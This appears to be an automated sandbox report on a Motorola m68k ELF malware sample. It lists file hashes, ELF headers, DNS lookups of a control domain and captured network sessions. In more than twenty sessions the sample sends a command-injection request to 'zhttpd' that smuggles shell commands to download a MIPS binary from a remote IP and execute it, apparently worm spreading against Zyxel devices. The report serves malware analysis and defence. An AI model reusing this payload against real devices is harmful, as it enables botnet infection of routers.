                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        Process:/tmp/yonariVpu7.elf
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20
                                        Entropy (8bit):4.1219280948873624
                                        Encrypted:false
                                        SSDEEP:3:TgPEc9LGn:TgPo
                                        MD5:6447745853AFB08EDDAE8DB69213F9A7
                                        SHA1:449876C5FBE1E5B6E2D444D4B2CA551A121C3A26
                                        SHA-256:D85943284AFF45265F8944F946C5BF7E142544346747C3C22FBFFA6D12CADB60
                                        SHA-512:B4F3C23FDEFCA778E6E36AACEA95851D4755721BE3DE42E2E394F94C80881152841EBF71D8821BE8368DC39D5D0FCDF2D617C8DCE5D888C5EF3B4B45C4390B46
                                        Malicious:false
                                        Preview:/tmp/yonariVpu7.elf.
                                        File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                        Entropy (8bit):5.8013572022715
                                        TrID:
                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                        File name:yonariVpu7.elf
                                        File size:165'440 bytes
                                        MD5:df911e5ac853eb81ebf1bb25c00be151
                                        SHA1:c8ee0cdb385401a5caf1355d59b467ece51b3f0c
                                        SHA256:86a53b674cf7c2829e1b9ad447103f20e8be59498d6412a7b387e4ba4cbcb241
                                        SHA512:1f74d4c580f45dbcb133e86d2555357bf2476dcc715ff39db2e488dcdf313591bdf3852f160dfe435c3c55e4ed02223ca6ff1628546336d6b09aa78bace511d7
                                        SSDEEP:3072:zEByAcG4o8/vv/eTXYPW00l3PSumB/WTVrjbidL6yzIlyy/p1C:oB+VbHDZ0lfSh/WkL6y4yyh1C
                                        TLSH:7FF33AD7F800DEBDF84EE33648230909B130B7D111925B376297797BED3A19A1927E86
                                        File Content Preview:.ELF.......................D...4.........4. ...(......................;B..;B...... .......;H..[H..[H..I(...0...... .dt.Q............................NV..a....da.....N^NuNV..J9...pf>"y..[d QJ.g.X.#...[dN."y..[d QJ.f.A.....J.g.Hy..;DN.X........pN^NuNV..N^NuN

                                        ELF header

                                        Class:ELF32
                                        Data:2's complement, big endian
                                        Version:1 (current)
                                        Machine:MC68000
                                        Version Number:0x1
                                        Type:EXEC (Executable file)
                                        OS/ABI:UNIX - System V
                                        ABI Version:0
                                        Entry Point Address:0x80000144
                                        Flags:0x0
                                        ELF Header Size:52
                                        Program Header Offset:52
                                        Program Header Size:32
                                        Number of Program Headers:3
                                        Section Header Offset:165040
                                        Section Header Size:40
                                        Number of Section Headers:10
                                        Header String Table Index:9
                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                        NULL0x00x00x00x00x0000
                                        .initPROGBITS0x800000940x940x140x00x6AX002
                                        .textPROGBITS0x800000a80xa80x20dee0x00x6AX004
                                        .finiPROGBITS0x80020e960x20e960xe0x00x6AX002
                                        .rodataPROGBITS0x80020ea40x20ea40x2c9e0x00x2A002
                                        .ctorsPROGBITS0x80025b480x23b480xc0x00x3WA004
                                        .dtorsPROGBITS0x80025b540x23b540x80x00x3WA004
                                        .dataPROGBITS0x80025b600x23b600x49100x00x3WA0032
                                        .bssNOBITS0x8002a4700x284700x46080x00x3WA004
                                        .shstrtabSTRTAB0x00x284700x3e0x00x0001
                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                        LOAD0x00x800000000x800000000x23b420x23b426.20150x5R E0x2000.init .text .fini .rodata
                                        LOAD0x23b480x80025b480x80025b480x49280x8f300.45390x6RW 0x2000.ctors .dtors .data .bss
                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 14, 2024 16:18:00.880047083 CET192.168.2.138.8.8.80x2f1dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:03.741219044 CET192.168.2.138.8.8.80x342aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:13.600723028 CET192.168.2.138.8.8.80x648aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:17.470988989 CET192.168.2.138.8.8.80xaa74Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:26.293107986 CET192.168.2.138.8.8.80x951dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:29.120076895 CET192.168.2.138.8.8.80xd93aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:34.953881979 CET192.168.2.138.8.8.80x1b02Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:45.806458950 CET192.168.2.138.8.8.80x6bc5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:53.671091080 CET192.168.2.138.8.8.80x6dc9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:00.550453901 CET192.168.2.138.8.8.80xbaf0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:04.424212933 CET192.168.2.138.8.8.80x1f50Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:07.252194881 CET192.168.2.138.8.8.80xbd4bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:14.110860109 CET192.168.2.138.8.8.80xf9ceStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:15.975682974 CET192.168.2.138.8.8.80xbfa4Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:17.840338945 CET192.168.2.138.8.8.80xcaf1Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:26.665199995 CET192.168.2.138.8.8.80xa1f2Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:29.498322964 CET192.168.2.138.8.8.80x725Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:32.360390902 CET192.168.2.138.8.8.80xb73eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:39.187517881 CET192.168.2.138.8.8.80x6985Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:50.017981052 CET192.168.2.138.8.8.80x558cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:56.877566099 CET192.168.2.138.8.8.80xcc19Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:20:06.744509935 CET192.168.2.138.8.8.80xeb71Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 14, 2024 16:18:00.980200052 CET8.8.8.8192.168.2.130x2f1dNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:03.841248035 CET8.8.8.8192.168.2.130x342aNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:13.702085018 CET8.8.8.8192.168.2.130x648aNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:17.570966959 CET8.8.8.8192.168.2.130xaa74No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:26.392875910 CET8.8.8.8192.168.2.130x951dNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:29.220046997 CET8.8.8.8192.168.2.130xd93aNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:35.054225922 CET8.8.8.8192.168.2.130x1b02No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:45.908950090 CET8.8.8.8192.168.2.130x6bc5No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:18:53.771372080 CET8.8.8.8192.168.2.130x6dc9No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:00.650876045 CET8.8.8.8192.168.2.130xbaf0No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:04.524434090 CET8.8.8.8192.168.2.130x1f50No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:07.352375031 CET8.8.8.8192.168.2.130xbd4bNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:14.215990067 CET8.8.8.8192.168.2.130xf9ceNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:16.075508118 CET8.8.8.8192.168.2.130xbfa4No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:17.941270113 CET8.8.8.8192.168.2.130xcaf1No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:26.769670010 CET8.8.8.8192.168.2.130xa1f2No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:29.600812912 CET8.8.8.8192.168.2.130x725No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:32.461061001 CET8.8.8.8192.168.2.130xb73eNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:39.287744999 CET8.8.8.8192.168.2.130x6985No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:50.123929024 CET8.8.8.8192.168.2.130x558cNo error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Jan 14, 2024 16:19:56.979300976 CET8.8.8.8192.168.2.130xcc19No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                        Session IDSource IPSource PortDestination IPDestination Port
                                        0192.168.2.1340282113.188.112.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936024904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1192.168.2.1353508198.141.47.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936166048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2192.168.2.1338762133.9.11.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936196089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3192.168.2.1348308151.198.10.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936244011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4192.168.2.133389097.109.209.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936288118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5192.168.2.134032496.165.11.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936338902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6192.168.2.1353796189.22.113.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936356068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7192.168.2.1335258161.99.27.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936419010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8192.168.2.1352446136.48.112.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936495066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9192.168.2.1359932146.41.46.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936531067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10192.168.2.1359278206.24.23.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936563015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11192.168.2.1339686102.153.11.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936604023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12192.168.2.133724485.253.117.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936640978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13192.168.2.1341558139.16.53.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936661959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        14192.168.2.1338864107.90.157.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936728954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15192.168.2.135463837.230.74.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936773062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16192.168.2.133310649.206.140.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936835051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17192.168.2.133624691.162.159.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936856985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18192.168.2.1350976108.243.129.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936933041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19192.168.2.133882412.84.95.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.936955929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20192.168.2.133659462.187.139.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.937042952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21192.168.2.1336568114.210.141.134443
                                        TimestampBytes transferredDirectionData
